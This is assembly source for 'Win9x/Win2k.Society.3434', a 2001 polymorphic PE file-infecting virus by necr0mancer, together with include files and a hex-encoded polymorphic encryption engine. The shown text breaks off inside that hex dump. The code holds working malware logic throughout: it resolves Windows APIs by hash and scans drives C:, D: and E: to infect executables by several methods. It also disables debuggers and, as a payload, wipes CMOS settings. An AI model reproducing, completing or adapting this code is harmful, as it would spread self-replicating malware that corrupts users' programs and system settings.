ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SOCIETY.TXT]ÄÄÄ ;============================================================================== ; Win9x/Win2k.Society.3434 (c) necr0mancer ; december 2001 ;ring-3 PE infector ; ;Features: ; ; * Works only in win2k & win9x,but can work on winNT(I haven't it!) if ; you add it kernel base on table (see source). ; * Polymorphic (use NPE32 engine). ; * Some infection methods (EPO,standart, .reloc OR .debug overwrite). ; * Simple antidebug. ; * Payload (on trace with td32:)) CMOS kill.) ; * Not infecting winzip self-extactors & upx-packed files ; ;Tnx: to all who write stuff. ; Infection sheme: ; ;============================================================================== ; ÚÄÄÄÄÄÄÄÄÄÄÄ¿ ; ³ main ³ ÍÍÍÍÍ - incorect secton size ; ÀÄÄÄÄÄÂÄÄÄÄÄÙ ; ÚÄÄÄÄÄÁÄÄÄÄÄ¿ ; ³ find reloc³ ; ÀÄÄÄÄÄÂÄÄÄÄÄÙ ; ÚÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄ¿ ; ÚÄÄÁÄÄÄ¿ ÚÄÄÄÁÄÄ¿ ; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´findedÆÍÍÍÍÍÍ» ³failed³ ; ³ ÀÄÄÂÄÄÄÙ º ÀÄÄÄÂÄÄÙ ; ³ ÚÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄ¿ º ÚÄÄÄÄÁÄÄÄÄÄÄÄÄ¿ ; ³ ³ EPO infection ³ ÚÄ×ÄÄÄ´ find .debug ³ ; ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ º ÀÄÄÄÄÂÄÄÄÄÄÄÄÄÙ ; ³ ³ º ³ ; ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ º ÚÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ; ÀÄ´Overwrite infection ÃÄÄÄÄÙ ÈÍÍ͵"standart" infection ³ ; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ; ; ;============================================================================== include 1.inc include win.inc PAGE_READWRITE equ 4 FILE_MAP_WRITE equ 2 DEBUG equ 0 ;no debug-release;) extrn MessageBoxA:near extrn ExitProcess:near VIRTUAL_SIZE equ (offset _endvbody-offset _start) PHYSICAL_SIZE equ (offset _fbodyend-offset _start) DEBUG equ 0 .586p .model flat .data message_title db '[Dekadance] has been start.',0 _message db 'Credo:',0dh db 'Dekadance is lifestyle.',0dh,0dh db 'Copyleft (c) 2001 necr0mancer',0 .code _emulation: push eax ;jmp viri xor eax,eax jmp _callz_manager Original: push MB_ICONEXCLAMATION push offset message_title push offset _message push 0 call MessageBoxA push 0 call ExitProcess ; call 
ExitProcess ;------------------------------------------------------------------------------ ;Run loader _callz_manager: pushfd ;save flags®s pusha @cm equ <-offset @@GetDelta> call @@GetDelta ;get delta @@GetDelta: pop ebp if DEBUG eq 1 int 3 endif and eax,0ffh ;AL=# in function table push eax push ebp xor edi,edi nop_call: call _start pop ebp push edi lea edi,[ebp+nop_call @cm] mov eax,90909090h ;write nop for next call stosd stosb pop edi pop eax ;eax=# in function table shl eax,3 ;eax*8 or edi,edi ;first mng_call? jnz table_offset_exist db (0b8h OR __edi) ;mov edi,xxxxxxxx delta_tbl dd 0 jmp short get_me_out table_offset_exist: mov [ebp+delta_tbl @cm],edi ;save table_pointer ;for next calls get_me_out: lea edi,[edi+eax] mov eax,[esp+8*4+4] ;restore old eax mov [esp._eax],eax mov [esp+8*4+4],edi ;write ret adr popa popfd ret ;============================================================================== ;Virii part @ex equ <-offset Delta> _start: call Delta ;get Delta Delta: if DEBUG eq 1 int 3 endif pop ebp jmp short AfterData ;go to main part ; === some data === imagebase dd 00400000h OldRVA dd (offset Original-00400000h) fmask db '*.exe',0 tbl: dd 77e80000h dd 0Bff70000h dd 0 jmp_table: mov eax,offset Original jmp eax dq 9 dup (0) Mask_table: db 2 dw 025FFh ;jmp xxxxxxx db 0 db 0 db 0 ;============================================================================= Fsize dd ? Voff dd ? Foff dd ? MZbase dd ? 
AfterData: db 0b8h ;mov eax,xxxxxxxx reTT_need dd 1 ;flag of type infection or eax,eax jnz no_need_heh mov eax,[ebp+OldRVA @ex] ;restore old entrypoint add eax,[ebp+imagebase @ex] push eax ;FOR returning in prog no_need_heh: lea esi,[ebp+jmp_table @ex] ;copy adr_table lea edi,[ebp+jmp_tmp_table @ex] mov ecx,10*2 rep movsd lea eax,[ebp+offset @@@error_handle @ex];find kernel base push eax xor eax,eax push 4 ptr fs:[eax] ;set SEH mov fs:[eax],esp lea esi,[ebp+offset tbl @ex] ;possible kernel bases lea edi,[ebp+offset __kernel32 @ex] pusha jmp _lodsd _ex: pop 4 ptr fs:[eax] ;restore SEH pop eax ; jmp no_yet ;& exit ;============================================================================= @@@error_handle: mov esp,[esp+8] sub esp,20h _lodsd: popa lodsd or eax,eax ;end of table ? je _ex mov [edi],eax pusha db 0b8h __kernel32 dd 0 cmp word ptr[eax],'ZM' ;test on MZ jne _lodsd __ok: xchg eax,ebx xor eax,eax add esp,20h pop 4 ptr fs:[eax] ;restore SEH pop eax ;============================================================================== sys_ok: lea esi,[ebp+offset _Table @ex] ;table of CRC32 lea edi,[ebp+offset _adr @ex] ;table of needed ;function's adresses Ft_repeat: call get_proc_adr ;find adress or eax,eax ;no finded :( jz end_Ft_cycle stosd jmp Ft_repeat end_Ft_cycle: out 70h,al ; in al,71h ; inc al ; shl eax,8 ; mov ecx,1000000 ; GET RANDOM NUMBER loop $ ; out 70h,al ; in al,71h ; not eax ; save it mov [ebp+__seed @ex],eax ; for virii inc eax ; mov [ebp+runSeed @ex],eax ; and for NPE xor eax,eax ;files infected=0 mov 4 ptr[ebp+FileNum @ex],eax mov [ebp+our_ebp @ex],ebp ;save current delta ;for creating thread xor ebx,ebx ;ebx=0 lea eax,[ebp+offset Thr_indefirer @ex] push eax push ebx ;push 0 push ebx ;push 0 lea eax,[ebp+offset Thread_proc @ex] ;offset to thread proc push eax push ebx ;push 0 push ebx ;push 0 call [ebp+CreateThread @ex] ;Create thread no_yet: lea edi,[ebp+offset jmp_tmp_table @ex] ;get jmp_table pointer ;to calls_manager retn ;exit to parent 
code Thread_proc: db (0b8h or __ebp) ;mov ebp,xxxxxxxx our_ebp dd 0 lea edi,[ebp+SearchRec @ex] lea edx,[ebp+dirname @ex] mov [edx],'\:C' call filefind ;infect drives mov [edx],'\:D' call filefind mov [edx],'\:E' call filefind db 0b8h ;mov eax,xxxxxxxx Thr_indefirer dd 0 push eax call [ebp+ExitThread @ex] ;good bye! ;========================================================================================= ;Input: esi=offset of string ; ebx=kernel adr ;Out : eax=adr(if has finded;)) get_proc_adr proc push edi push eax lodsd mov [ebp+crc32 @ex],eax ;save getted crc pop eax mov ecx,[ebx+3ch] ;PE-header offset add ecx,ebx mov ecx,[ecx+78h] ;Export table offset jecxz return_0 ;if (et=null) then err add ecx,ebx ;ecx-offset of export ;table xor edi,edi _search: mov edx,[ecx+20h] ;offsets on FuncNames add edx,ebx ;correct on base mov edx,[edx+edi*4] add edx,ebx push esi ;crc table push ecx ;base mov esi,edx push edx find_zero: lodsb or al,al jnz find_zero dec esi sub esi,edx xchg ecx,esi pop esi call CRC32 db (0b8h or __edx) ;mov edx,crc crc32 dd 0 pop ecx ;base pop esi ;table cmp edx,eax je _name_found inc edi cmp edi,[ecx+18h] jb _search return_0: xor eax,eax ;error ocures jmp _return _name_found: ;esi=index on string table mov edx,[ecx+24h] add edx,ebx movzx edx,word ptr [edx+edi*2] mov eax,[ecx+1ch] ;AdrTable add eax,ebx ;correct on base mov eax,[eax+edx*4] add eax,ebx ;get adress of nedded function _return: pop edi ;in output eax retn get_proc_adr endp ;============================================================================= ; INFECT ;============================================================================= infect proc pushad mov esi,edx ;esi=edx=full name _findzero: lodsb or al,al jnz _findzero ;esi=offset of null byte+1 mov eax,[esi-4] cmp eax,00455845h ;EXE? je exe_infect cmp eax,00657865h ;exe? jne no_EXE exe_infect: cmp byte ptr [ebp+FileNum @ex],15 ja no_EXE ;More than 15 files? _gogo: call fopen ;edx=FileName or eax,eax ;error ocures? 
je i_close_exit xchg ebx,eax ;ebx=handle call f_createmap ;createfilemapping mov [ebp+MZbase @ex],eax xchg eax,edx ;edx=mem_adr mov ax,word ptr[edx+18h] cmp al,40h jne i_close_exit mov eax,[edx+3ch] add edx,eax ;EDX=offset of PE header mov eax,[edx] cmp ax,'EP' ;really PE ? jne i_close_exit ;get last section movzx eax,word ptr[edx+14h] ;NT header size add eax,18h ;Size of PE-header add eax,edx ;Eax=offset of Object table push eax push edx movzx eax,word ptr[edx+6h] ;Number of objects dec eax smov esi,40 ;size of table mul esi ;result in EDX:EAX xchg esi,eax ;ESI=offset of last object pop edx pop eax mov edi,eax ;edi=Object-table add esi,eax ;correct(esi=last object) push edi ;============================================================================= ;find winzip or UPX0 mov al,1 movzx ecx,word ptr[edx+6h] ;Number of objects find_upx: cmp 4 ptr[edi],'niw_' ;_winzip_ je zip_upx cmp 4 ptr[edi],'0XPU' ;UPX0 je zip_upx add edi,40 loop find_upx xor eax,eax zip_upx: ;============================================================================= pop edi or eax,eax jnz i_close_exit mov eax,[edx+34h] ;get & save imagebase mov [ebp+imagebase @ex],eax mov ecx,[esi+10h] ;get Fsize mov [ebp+Fsize @ex],ecx mov eax,[esi+8h] ;get Vsize or eax,eax ;Vsize=0? jz i_close_exit or ecx,ecx ;Fsize=0? jz i_close_exit cmp eax,ecx ;Vsize<Fsize jb i_close_exit mov eax,[esi+14h] ;get Foffset mov [ebp+Foff @ex],eax mov eax,[esi+0Ch] ;get Voffset mov [ebp+Voff @ex],eax mov ecx,'emit' ;check & write sign cmp [edx+08h],ecx je i_close_exit mov [edx+08h],ecx push esi ;esi=last (copy) push eax ;SAve VO of virii push edi ;obj-table offst ;find .reloc section movzx ecx,word ptr[edx+6h] ;Number of objects find_reloc: cmp 4 ptr[edi],'ler.' ;.reloc je question_EPO add edi,40 loop find_reloc ;============================================================================== ;find .debug section pop edi ;begin of sections tabl. movzx ecx,word ptr[edx+6h] ;Number of objects find_debug: cmp 4 ptr[edi],'bed.' 
;.debug je @@reloc_debug_finded add edi,40 loop find_debug ;============================================================================== ;neither .reloc nor .debug not finded jmp @@Standart @@reloc_finded_stack: pop eax ;clear stack @@reloc_debug_finded: ;.reloc or .debug are finded mov eax,[ebp+MZbase @ex] ;begin of Exe add eax,[edi+14h] ;esi=Physical_Offset of .debug section mov 4 ptr[ebp+reloc_offset @ex],eax @@Overwrite: add esp,4*2 xor ecx,ecx mov [ebp+reTT_need @ex],ecx ;set flag @@overwrite=0 xchg edi,esi ;esi=.reloc secton lea eax,[edx+28h] ;set new RVA mov ecx,[eax] or ecx,ecx jz i_close_exit ;RVA=0 mov [ebp+OldRVA @ex],ecx mov ecx,[esi+0ch] ;section RVA mov [eax],ecx mov eax,10000 ;get 10 kb call GetMem push eax xchg edi,eax call call_NPE32 ;edi=bufer dectination mov [esi+24h],0E0000020h ;set attributes add [esi+10h],ecx ;Add virus size xchg edi,esi ;esi=data db (0B8h or __edi) ;mov edi,xxxxxxxx reloc_offset dd 0 rep movsb ;write virii jmp common_exit @@Standart: pop esi ;<<<clear stack pop esi xor ecx,ecx mov [ebp+reTT_need @ex],ecx ;set flag @@overwrite=0 lea edi,[edx+28h] ;set new RVA mov ecx,[edi] or ecx,ecx ;RVA==0 ? 
jz i_close_exit mov [ebp+OldRVA @ex],ecx mov eax,[ebp+Voff @ex] add eax,[ebp+Fsize @ex] ;eax=virtual offset+physic size=new RVA mov [edi],eax mov eax,10000 ;10 kb call GetMem push eax xchg edi,eax mov ecx,[edx+38h] ;Virtual aligment mov eax,VIRTUAL_SIZE+400h*2 ;add 2 kb for decryptor call Round ;align to phys_aligment add [esi+08h],eax ;Add virus size to section mov eax,[esi+08h] mov ecx,[ebp+Voff @ex] ;Virtual offset+virtualsize add ecx,eax mov [edx+50h],ecx ;Correct imageSize mov [esi+24h],0E0000020h ;set attributes call call_NPE32 add [esi+10h],ecx ;Add virus size push ecx mov ecx,[ebp+Foff @ex] add ecx,[ebp+Fsize @ex] ;Offset of end of last section call fseek pop ecx ;restore cpypted_size call fwrite ;write virii jmp common_exit ;============================================================================== question_EPO: cmp 4 ptr[edi+10h],PHYSICAL_SIZE+900h ;check section size jnb size_s_ok pop eax ;<<<clear stack jmp @@Standart ;standart infect size_s_ok: ;if reloc < virsize smov eax,3 ;max 2 call randomGen ;get random number or eax,eax ;0 = make overwrite jnz _dbg ;1 = make EPO ;2 = debugers sucks:) ; & EPO _clear_one_param: ; pop eax ;<<<clear stack ; jmp @@reloc_debug_finded jmp @@reloc_finded_stack _dbg: dec eax ;eax==1? jz @@reloc_EPO call Debuger_fuckup @@reloc_EPO: pop eax ;first obj. 
inc 4 ptr[ebp+reTT_need @ex] ;set flag @@overwrite ;into 1 or whatever value mov esi,[ebp+MZbase @ex] ;begin of Exe add esi,[eax+14h] ;esi==Physical_Offset of first section pop eax ;clear stack<<<< mov eax,[ebp+Voff @ex] add eax,[ebp+Fsize @ex] ;eax=virtual offset ;+physic size=new RVA mov ecx,[edi+0ch] ;get section RVA pop eax ;clear stack<<<< push edi ;.reloc offset mov edi,[edi+14h] ;edi=offset of .reloc section add edi,4 ptr[ebp+MZbase @ex] ;correct on begin of file mov eax,400h ;write_some_garbage call randomGen inc eax add ecx,eax ;correct RVA_reloc add eax,edi mov [ebp+EPO_edi @ex],eax lea eax,[ebp+Mask_table @ex] push eax lea eax,[ebp+replace @ex] push eax smov eax,10 ;get random (max 10) call randomGen inc eax push eax ;count of functions push edi ;RELOC offset push esi ;CODE offset push ecx ;virtual offset ;----------------------------------------------------------------------------- ;Create_UEP( ; dword VO // virtual offset ; *dword code // offset to .code section(already has read) ; *dword reloc // offset to .reloc section(already has read) ; dword num_records // count of records in table to rewrite ; *dword adr_modify // address of "replasing" proc ; *dword mask_table // pointer to a mask table ; ); ;----------------------------------------------------------------------------- call Create_UEP pop esi ;restore original esi jc i_close_exit ;no_relocs_finded :( mov eax,10000 ;get 10 kb call GetMem push eax xchg edi,eax ;edi=mem call call_NPE32 ;cpypt virii add [esi+10h],ecx ;Add virus size mov [esi+24h],0E0000020h ;set attributes push ecx push edi db (0b8h or __edi) ;mov edi,EPO_edi EPO_edi dd 0 lea esi,[ebp+c_manager @ex] mov ecx,cm_size ;manager size rep movsb ;copy "manager" pop esi pop ecx rep movsb ;copy virii common_exit: call [ebp+GlobalFree @ex] ;free memory inc byte ptr [ebp+FileNum @ex] i_close_exit: call f_closemap ;unmap file from memory call fclose ;close file no_EXE: popad retn infect endp 
;============================================================================== ;In: edx=dirname ; edi=SearchRec filefind proc pushad sub esp,1024 ;for full directory name mov esi,edx ;esi=offset of dirname mov edi,esp ;edi=memory for FULL dirname _scopy: lodsb stosb or al,al ;end of ASCIIZ string? jnz _scopy dec edi mov al,'\' ;add '\' if need cmp [edi-1],al je _estislesh stosb _estislesh: mov esi,edi ;esi=position for file/dir mov eax,'*.*' stosd mov eax,esp mov edi,[esp+1024] ;restore edi push edi push eax call [ebp+FindFirstFile @ex] ;eax=handle for search inc eax jz ff_quit ;cmp eax,-1 dec eax xchg ebx,eax ;search handle ff_infect: push ecx ;pause mov ecx,1000000 loop $ pop ecx pushad xchg esi,edi ;edi=position of file/dir,esi=ff_struc lea esi,[esi].ff_fullname ;esi=finded name _sadd: lodsb ;string add stosb or al,al jnz _sadd popad mov edx,esp ;FULL name of file/dir test byte ptr [edi].ff_attr, 16 jnz ff_dir ;dir? call infect ;no dir,infect jmp ff_next ff_dir: cmp byte ptr [edi].ff_fullname,'.' je ff_next call filefind ff_next: push edi push ebx call [ebp+FindNextFile @ex] or eax,eax jnz ff_infect ;no dirs/files? 
ff_quit: push ebx call [ebp+FindClose @ex] add esp,1024 popad retn filefind endp ;============================================================================== ;In : edi=bufer ;Out : ecx=size generated ;modify :eax,edx,ecx call_NPE32 proc call Debuger_fuckup push ebx push edx xor eax,eax inc eax cpuid ;get unical value xor eax,edx ;for this CPU pop edx pop ebx push eax ;move it in flags mov eax,[ebp+offset runSeed @ex] push eax ;seed (or NULL) xor eax,eax mov [ebp+offset runSeed @ex],eax ;seed has been ;inicialized == NULL _push_size: mov eax,PHYSICAL_SIZE push eax ;size push edi ;bufer lea eax,[ebp+offset _start @ex] ;data push eax ;============================================================================== ;int NPE_main( ; offset data ; offset bufer ; count_bytes ; seed (nul if not 1st generation) ; flags ; ) ;============================================================================== call npe_main ;out eax=size xchg ecx,eax jnc e_call_npe32 ;if no errors ;---------------- error ------------------ mov ecx,PHYSICAL_SIZE pusha lea esi,[ebp+offset _start @ex] ;data ;edi = bufer rep movsb ;copy virii to bufer popa e_call_npe32: retn call_NPE32 endp ;============================================================================== GetMem proc pusha push eax push GMEM_FIXED call [ebp+GlobalAlloc @ex] ;GetMemory ;eax=offset of getted memory mov [esp._eax],eax popa retn GetMem endp ;============================================================================== ;Input:ecx=field of rounding ; eax=size Round proc bsr ecx,eax ;Scan backward for bit dec ecx shr eax,cl inc eax shl eax,cl retn Round endp ;============================================================================== CRC32 proc pusha db (0b8h or __ebx) ;mov ebx,polinom polinom dd 04c11db7h xor edx,edx next_8_bites: push ecx xor eax,eax lodsb shl eax,32-8-1 smov ecx,8 carry_find: shl eax,1 shld edx,eax,1 jnc not_carry xor edx,ebx not_carry: loop carry_find pop ecx loop next_8_bites ;add null bites smov 
ecx,32+8+1 @carry_find: shl edx,1 jnc @not_carry xor edx,ebx @not_carry: loop @carry_find mov [esp._eax],edx ;return CRc in eax popa ret CRC32 endp ;============================================================================== replace: ;=== copy old jumper to table=== ;ecx=#of finded ;edi=offst of command(cor) ;ebx=offset of commnd(phys) ;esi=setted virtual offset pusha push esi push edi xchg edi,esi lea edi,[(ebp+offset jmp_table)+ecx*8 @ex] ;num in table movsd movsd pop edi mov ax,0b050h ;push eax+mov al stosw ;ecx=count/index xchg eax,ecx ;eax=num records param mov ah,0e9h ;jmp..... stosw pop eax ;VO sub eax,ebx sub eax,5+3 ;Pa3Huya stosd popa retn ;============================================================================== ;============================================================================= randomGen proc pusha push eax ;save max_random db 0b8h ;mov eax,xxxxxxxx __seed dd 12345678h mov edi,134775813 ;eax=new seed mul edi ;EDX:EAX=EAX*EDI inc eax mov [ebp+__seed @ex],eax xor edx,edx pop ecx or ecx,ecx ;max_random=0 jz __div_0 div ecx mov [esp._eax],edx __div_0: popa ret randomGen endp ;============================================================================= Debuger_fuckup proc pusha call [ebp+IsDebuggerPresent @ex] ;catch stupid TD32 ;) or eax,eax jnz fuckup push edi sidt [esp-2] pop edi mov [edi+1*8],eax ;kill int 1 mov [edi+3*8],eax ;kill int 3 mov dr0,eax ;kill debug system regs mov dr1,eax ;NOTE: mov dr2,eax ; SoftIce is interrupts mov dr3,eax ; this commands & ; virii suck. 
popa retn fuckup: smov eax,5eh ;Clear CMOS smov edx,70h call PM_out xor eax,eax smov edx,71h call PM_out jmp $ ;============================================================================= PM_out proc push eax push edx mov edx, esp smov eax,0F7h ;WRITE_PORT_UCHAR int 2Eh add esp, 2*4 retn PM_out endp ;============================================================================= Debuger_fuckup endp c_manager: include call_mng.inc cm_size equ $-offset c_manager include RIPbin.inc include ring3io.inc include npe32bin.inc _Table: _CreateFileA dd 0830F55B4h _CreateFileMapping dd 06817C213h _MapViewOfFile dd 0CF4C00A1h _UnmapViewOfFile dd 0C027BC23h _CloseHandle dd 07CD0735Bh _ReadFile dd 02804FB4Dh _FindFirstFileA dd 0A32BE888h _FindNextFileA dd 0233AEB5Eh _FindClose dd 0E6CCF387h _GlobalAlloc dd 06CCA7EE0h _GlobalFree dd 04753EBE5h _SetFilePointer dd 0E747C386h _WriteFile dd 018D5ABDFh _GetCurrentDirectoryA dd 0B089B6BEh _IsDebuggerPresent dd 015B27F29h _ExitThread dd 01E799321h _CreateThread dd 072F17A7Bh its_over dd 0FFFFFFFFh _fbodyend: _adr: CreateFile dd ? ;2 CreateFileMappingA dd ? MapViewOfFile dd ? UnmapViewOfFile dd ? CloseHandle dd ? ;3 ReadFile dd ? ;4 FindFirstFile dd ? ;6 FindNextFile dd ? ;7 FindClose dd ? ;8 GlobalAlloc dd ? ;9 GlobalFree dd ? ;a SetFilePointer dd ? ;b WriteFile dd ? ;c GetCurrentDirectory dd ? ;d IsDebuggerPresent dd ? ExitThread dd ? CreateThread dd ? ;------------------------------------- curdir db 260 dup (?) SearchRec f_struc<,,,,,,,> DirNum db ? FileNum db ? bytesread dd ? first_run_npe dd ? runSeed dd ? dirname dd ? jmp_tmp_table: dq 10 dup (?) 
_endvbody: end _emulation ;============================================================================== ; (C) necr0mancer 2001 ; necr0mancer2001@hotmail.com ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SOCIETY.TXT]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[1.INC]ÄÄÄ MAX_GARBAGE equ 6 MAX_OPERATIONS equ 5 ;cryptor size ; 100+(6*5*6*5)~1kb maximum ; ; __eax equ 000b __ebx equ 011b __edx equ 010b __ecx equ 001b __esi equ 110b __edi equ 111b __ebp equ 101b smov macro p1,p2 if p2 gt 07fh if p2 lt 100h if p1 eq eax xor eax,eax mov al,&p2& endif if p1 eq ebx xor ebx,ebx mov bl,&p2& endif if p1 eq ecx xor ecx,ecx mov cl,&p2& endif if p1 eq edx xor edx,edx mov dl,&p2& endif else mov &p1&,&p2& endif else push &p2& pop &p1& endif endm opcod struc code dw 0 flags db 0 code_num db 0 opcod ends ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[1.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CALL_MNG.INC]ÄÄÄ ;============================================================================= ;Api_call stub (c) necr0mancer ;necr0mancer2001@hotmail.com ;============================================================================= db 09Ch,060h,0E8h,000h,000h,000h,000h,05Dh,0CCh,025h,0FFh,000h,000h,000h,050h db 055h,033h,0FFh,0E8h,031h,000h,000h,000h,05Dh,057h,08Dh,07Dh,00Bh,0B8h,090h db 090h,090h,090h,0ABh,0AAh,05Fh,058h,0C1h,0E0h,003h,00Bh,0FFh,075h,007h,0BFh db 000h,000h,000h,000h,0EBh,003h,089h,07Dh,026h,08Dh,03Ch,007h,08Bh,044h,024h db 024h,089h,044h,024h,01Ch,089h,07Ch,024h,024h,061h,09Dh,0C3h ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CALL_MNG.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[NPE32BIN.INC]ÄÄÄ ;============================================================================== ; Necromancer's Polymorphic Engine ; v 1.0 ; (c) necr0mancer december 2001 ; ; ;stdcall ;int NPE_main( ; DWORD *offset data //offset to data ; DWORD *offset bufer 
//offset of bufer(see ramarks) ; DWORD count_bytes //size of crypting data ; DWORD seed //(see remarks) ; DWORD flags //(see remarks) ; ); ; ;Output: EAX = Size of crypted data and decryptor. ; cf = 1 if error ; cf = 0 if success ; ;Remarks: ; Engine must run in r/w section. ; ; *bufer : Size of bufer must be larger of really size data beakose NPE use ; bufer for building cryptor/decryptor. ; In real size of bufer must be about 400h*3+size of data+1 ; But I test it with many-memory allocate & can't said ; about working npe32 with little bufer. ; ; Flags: ; ; bits: ; ÚÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ; ³ 0..6 ³ Using regs32 ³ ; ÃÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ; ³ 7 ³ Antidebug functions enabled ³ ; ÃÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ; ³ 8..11 ³ number of commands in using commands ³ ; ÃÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ; ³ 11..16 ³ number of commands in using garbage ³ ; ÀÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ; ; Regs32 (bits 0..6): ; ÚÄÄÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄ¿ ; ³ bit ³ 0 ³ 1 ³ 2 ³ 3 ³ 4 ³ 5 ³ 6 ³ ; ÃÄÄÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ ; ³ reg ³EAX³EBX³EDX³ECX³ESI³EDI³EBP³ ; ÀÄÄÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÙ ; ; Seed: ; if this parametr is not NULL then randseed generator of NPE32 ; gets a new value for inicialize.If it is NULL NPE32 use getted ; value for any random operations. ; ;And one 'little' thing : npe32 has a bug working in multi-layer mode, ;which destroyes original data.If size of encryptors+data more than ;D00h bytes it happends. 
; ;necr0mancer2001@hotmail.com npe_main: db 060h,0E8h,000h,000h,000h,000h,05Dh,0EBh,077h,081h,0C0h,0A1h,001h,081h,0E8h db 0A1h,000h,081h,0F0h,0A1h,002h,0F7h,0D0h,085h,003h,0D1h,0C0h,085h,005h,0D1h db 0C8h,085h,004h,040h,000h,045h,007h,048h,000h,045h,006h,0F7h,0D8h,085h,008h db 087h,0C0h,082h,000h,08Bh,0C0h,082h,000h,083h,0C0h,0C9h,000h,083h,0E8h,0C9h db 000h,090h,090h,040h,000h,0EBh,000h,080h,000h,083h,0C8h,0CDh,000h,083h,0F0h db 0CDh,000h,00Bh,0C0h,082h,000h,023h,0C0h,082h,000h,000h,003h,002h,001h,006h db 007h,005h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h db 000h,000h,000h,000h,000h,061h,0F9h,0C3h,08Bh,04Ch,024h,030h,0E3h,006h,089h db 08Dh,0D0h,004h,000h,000h,08Bh,054h,024h,034h,052h,083h,0E2h,07Fh,08Dh,07Dh db 070h,08Dh,075h,04Fh,033h,0C0h,040h,06Ah,007h,059h,033h,0DBh,052h,023h,0D0h db 074h,002h,043h,0A4h,0D1h,0E0h,05Ah,0E2h,0F4h,00Bh,0DBh,074h,0CBh,083h,0FBh db 003h,072h,0C6h,089h,09Dh,0BBh,003h,000h,000h,058h,08Bh,0D0h,066h,081h,0E2h db 0FFh,000h,066h,025h,000h,0FFh,0C1h,0E8h,008h,08Bh,0C8h,025h,0F0h,000h,000h db 000h,0C1h,0E8h,004h,083h,0F8h,009h,076h,003h,06Ah,009h,058h,00Bh,0C0h,074h db 09Bh,089h,085h,0C2h,001h,000h,000h,083h,0E1h,00Fh,083h,0F9h,00Ah,076h,003h db 06Ah,00Ah,059h,00Bh,0C9h,074h,086h,089h,08Dh,0D1h,003h,000h,000h,08Bh,04Ch db 024h,02Ch,089h,08Dh,0F5h,002h,000h,000h,08Bh,07Ch,024h,028h,08Bh,074h,024h db 024h,057h,053h,051h,081h,0C7h,000h,00Ch,000h,000h,057h,0B8h,090h,000h,000h db 000h,003h,0C8h,0F3h,0AAh,05Fh,059h,08Bh,0DFh,00Fh,0BAh,0E2h,007h,073h,017h db 051h,056h,08Dh,0B5h,007h,005h,000h,000h,0B9h,019h,000h,000h,000h,001h,08Dh db 0F5h,002h,000h,000h,0F3h,0A4h,05Eh,059h,0F3h,0A4h,08Dh,08Dh,0CDh,004h,000h db 000h,058h,08Bh,0F0h,0FFh,0D1h,08Ah,054h,005h,070h,08Bh,0C6h,0FFh,0D1h,08Ah db 